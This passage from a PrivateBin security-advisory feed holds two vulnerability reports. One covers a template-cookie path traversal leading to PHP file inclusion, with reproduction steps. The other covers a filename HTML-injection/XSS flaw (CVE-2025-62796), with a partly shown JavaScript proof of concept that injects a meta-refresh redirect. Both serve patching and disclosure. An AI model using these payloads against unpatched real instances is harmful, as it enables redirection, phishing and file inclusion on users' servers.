&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nt"&gt;public&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;static&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;isTemplateAvailable&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="nt"&gt;template&lt;/span&gt;&lt;span class="o"&gt;):&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;bool&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in_array($template,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;getAvailableTemplates&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;to this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nt"&gt;public&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;static&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;isTemplateAvailable&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="nt"&gt;template&lt;/span&gt;&lt;span class="o"&gt;):&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;bool&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;$available&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in_array($template,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;getAvailableTemplates&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(!$available&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt;&lt;span class="n"&gt;View&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;isBootstrapTemplate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;View&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;getTemplateFilePath&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="err"&gt;$available&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;file_exists($path)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nt"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="nt"&gt;available&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The new code will now blindly trust &lt;code&gt;$template&lt;/code&gt;, unless it starts with the string &lt;code&gt;bootstrap-&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;View::getTemplateFilePath&lt;/code&gt; will return &lt;code&gt;PATH . 'tpl' . DIRECTORY_SEPARATOR . $file . '.php'&lt;/code&gt;, allowing directory traversal, but preventing non-PHP files to be included.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;View::draw&lt;/code&gt; will then include the user-submitted template:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="n"&gt;public&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;draw&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;getTemplateFilePath&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;file_exists&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="n"&gt;throw&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Template &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; not found!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;80&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;extract&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;_variables&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; this is only possible if &lt;code&gt;templateselection&lt;/code&gt; configuration is enabled, or if no template has been set. The &lt;code&gt;template&lt;/code&gt; will be rewritten if this condition isn't met:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nt"&gt;private&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;_setDefaultTemplate&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;$templates&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$this-&amp;gt;_conf-&amp;gt;getKey(&amp;#39;availabletemplates&amp;#39;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;$template&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$this-&amp;gt;_conf-&amp;gt;getKey(&amp;#39;template&amp;#39;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;TemplateSwitcher&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;setAvailableTemplates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;templates&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;TemplateSwitcher&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;setTemplateFallback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;force&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;default&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;template,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;template&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;selection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;disabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;default&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;set&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(!$this-&amp;gt;_conf-&amp;gt;getKey(&amp;#39;templateselection&amp;#39;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;!empty($template))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="err"&gt;$_COOKIE&lt;/span&gt;&lt;span class="cp"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;template&amp;#39;&lt;/span&gt;&lt;span class="cp"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$template&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="err"&gt;setcookie(&amp;#39;template&amp;#39;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$template,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;array(&amp;#39;SameSite&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;#39;Lax&amp;#39;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;#39;Secure&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;true))&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h3&gt;Reproduction Steps&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Configure PrivateBin with templateselection = true (default template list is fine).&lt;/li&gt;
&lt;li&gt;Send a request with a malicious template cookie like &lt;code&gt;template=../cfg/conf&lt;/code&gt;, where the relative path points to a PHP file without its file suffix&lt;/li&gt;
&lt;li&gt;The script now includes the select PHP file (leading to a 500 in that specific case).&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;h3&gt;Patches&lt;/h3&gt;
&lt;p&gt;The issue has been patched in version 2.0.3.&lt;/p&gt;
&lt;h3&gt;Workarounds&lt;/h3&gt;
&lt;p&gt;Set &lt;code&gt;templateselection = false&lt;/code&gt; in &lt;code&gt;cfg/conf.php&lt;/code&gt; or remove it, it's default is &lt;code&gt;false&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;We'd like to thank &lt;a href="https://github.com/esnard"&gt;Benoit Esnard&lt;/a&gt;, who reported this vulnerability.&lt;/p&gt;
&lt;p&gt;In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.&lt;/p&gt;
&lt;p&gt;If you think you have found a vulnerability or potential security risk, &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md"&gt;we'd kindly ask you to follow our security policy&lt;/a&gt; and report it to us. We then assess the report and will take the actions we deem necessary to address it.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2025-11-09 Received report via GitHub Security Advisory&lt;/li&gt;
&lt;li&gt;2025-11-10 Discussed and reproduced issue, wrote a unit test case based on this, started work on a patch&lt;/li&gt;
&lt;li&gt;2025-11-11 Further work on patch, refactored related code&lt;/li&gt;
&lt;li&gt;2025-11-12 Released patch with PrivateBin 2.0.3&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Vulnerability Report: Missing HTML sanitisation of attached filename in file size hint enabling persistent XSS, defacement, open redirect attacks etc. (CVE-2025-62796)</title><link href="https://privatebin.info/reports/vulnerability-2025-10-28.html" rel="alternate"/><published>2025-10-28T17:00:00+01:00</published><updated>2025-10-28T17:00:00+01:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2025-10-28:/reports/vulnerability-2025-10-28.html</id><summary type="html">&lt;p&gt;We've identified an HTML injection/XSS vulnerability in the PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. This has been mitigated in &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/2.0.2"&gt;PrivateBin 2.0.2&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;We've identified an HTML injection/XSS vulnerability in the PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. Below are the technical details, PoC, reproduction steps, impact, and mitigation recommendations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Recommend action:&lt;/strong&gt; As the vulnerability has been fixed in the latest version, users are &lt;strong&gt;strongly encouraged&lt;/strong&gt; to upgrade PrivateBin to the &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/2.0.2"&gt;latest version&lt;/a&gt; &lt;em&gt;and&lt;/em&gt; &lt;a href="https://privatebin.info/directory/check"&gt;check&lt;/a&gt; that a strong CSP header, just as the default suggested one, is delivered.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary of the vulnerability:&lt;/strong&gt; The &lt;code&gt;attachment_name&lt;/code&gt; field containing the attached file name is included in the object that the client encrypts and is eventually rendered in the DOM without proper escaping.&lt;/p&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;The vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition &lt;a href="https://cwe.mitre.org/data/definitions/80.html"&gt;a XSS vulnerability (CWE-80)&lt;/a&gt;, in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject &lt;a href="https://cwe.mitre.org/data/definitions/79.html"&gt;a script tag (as per CWE-79)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;That said, also due to &lt;a href="https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g#more-informaton"&gt;previous issues&lt;/a&gt;, we have strong mitigations for this in place. The &lt;a href="https://content-security-policy.com/"&gt;content security policy (CSP)&lt;/a&gt; does, if configured as recommend by the PrivateBin project, prevent any inline script execution, so the confidentiality of the paste is &lt;em&gt;not&lt;/em&gt; affected.&lt;/p&gt;
&lt;p&gt;However, as the reporter demonstrated, even when script execution is blocked, an HTML injection can still be used for attacks such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;redirection using a meta redirect tag to redirect to a potentially malicious/attacker-controlled website&lt;/li&gt;
&lt;li&gt;defacement of the website&lt;/li&gt;
&lt;li&gt;phishing, in combination with the redirection to a clone of a PrivateBin phishing page or similar&lt;/li&gt;
&lt;li&gt;potential attacks on other services hosted on the same domain&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This list is by no means meant to be exhaustive, other attacks should be considered possible, that is why we treat this issue as a serious issue, even if the CSP is supposed to block the most attacks.&lt;/p&gt;
&lt;blockquote&gt;
&lt;h3&gt;Important&lt;/h3&gt;
&lt;p&gt;Depending on the deployment, if the server has a different than the recommend CSP configured or the client (browser) somehow lacks a protection, the vulnerability can have much more serious impacts and potentially also allow XSS, which could mean the confidentiality of the PrivateBin instance is affected.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Technical Description&lt;/h2&gt;
&lt;p&gt;The front-end uses PrivateBin (client-side encryption) to format and encrypt data before sending. During the paste creation process, the client assembles a &lt;code&gt;cipherMessage&lt;/code&gt; object containing, among other fields:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;paste&lt;/code&gt; -&amp;gt; paste text&lt;/li&gt;
&lt;li&gt;&lt;code&gt;attachment&lt;/code&gt; -&amp;gt; file content (data-URI)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;attachment_name&lt;/code&gt; -&amp;gt; array with file names&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before encryption, the &lt;code&gt;ServerInteraction.setCipherMessage(cipherMessage)&lt;/code&gt; function is called. By intercepting/altering the &lt;code&gt;cipherMessage&lt;/code&gt; on the client immediately before encryption, it is possible to replace &lt;code&gt;attachment_name&lt;/code&gt; with an attacker-controlled string; this string becomes part of the encrypted content, and when the paste is opened, the local client decrypts and inserts the name into the DOM unescaped, allowing the interpretation of inserted HTML markup.&lt;/p&gt;
&lt;p&gt;Note that it was not necessary to reimplement encryption: the monkeypatch modifies the object before the client applies AES-GCM/PBKDF2/compression, thus avoiding ciphertext formatting issues.&lt;/p&gt;
&lt;h2&gt;Proof of Concept&lt;/h2&gt;
&lt;p&gt;Paste this into the console on the PrivateBin page before clicking Create.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Monkeypatch&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;modify&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;immediately&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;before&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;encryption&lt;/span&gt;
&lt;span class="p"&gt;(()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;desiredName&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=https://example.com/&amp;quot;&amp;gt;.txt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;-&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;adjust&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;here&lt;/span&gt;

&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;namespace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;PrivateBin&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;window&lt;/span&gt;&lt;span class="o"&gt;.$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!$.&lt;/span&gt;&lt;span class="n"&gt;PrivateBin&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!$.&lt;/span&gt;&lt;span class="n"&gt;PrivateBin&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ServerInteraction&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;PrivateBin namespace not found (make sure you are on the PrivateBin page).&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$.&lt;/span&gt;&lt;span class="n"&gt;PrivateBin&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ServerInteraction&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;save&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;original&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;function&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;origSetCipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SI&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setCipherMessage&lt;/span&gt;&lt;span class="err"&gt;?&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SI&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

